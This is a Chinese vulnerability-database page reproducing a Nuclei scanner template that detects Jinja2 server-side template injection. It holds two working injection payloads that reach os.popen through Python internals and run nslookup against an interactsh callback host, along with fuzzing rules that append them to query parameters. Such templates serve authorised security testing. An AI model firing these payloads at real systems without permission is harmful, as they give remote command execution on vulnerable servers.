jinja2-oob: Jinja2 - Out of Band Template Injection

日期: 2025-08-01 | 影响软件: Jinja2 | POC: 已公开

漏洞描述

PoC代码[已公开]

id: jinja2-oob

info:
  name: Jinja2 - Out of Band Template Injection
  author: 0xAwali,DhiyaneshDK,ritikchaddha
  severity: high
  reference:
    - https://pypi.org/project/Jinja2/
    - https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
  metadata:
    verified: true
  tags: ssti,dast,oast,oob,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      injection:
        - "{{self.__init__.__globals__.__builtins__.__import__('os').popen('nslookup+-type=SRV+{{interactsh-url}}').read()}}"
        - "{{ cycler.__init__.__globals__.os.popen('nslookup+-type=SRV+{{interactsh-url}}').read() }}"

    fuzzing:
      - part: query
        type: postfix
        mode: single
        fuzz:
          - "{{injection}}"

    skip-variables-check: true

    matchers:
      - type: dsl
        name: request-matcher
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(interactsh_request,'srv')"
        condition: and
# digest: 4a0a00473045022100e4455c7a4339740d674b6f59246f0a36069d2d3609cf3ee0ee4b4cc32a714c1402207190c306e14b6418adbaa991defce48c765a58b66d4cf0ace79524bb647006f5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssti/oob/jinja2-oob.yaml

相关漏洞推荐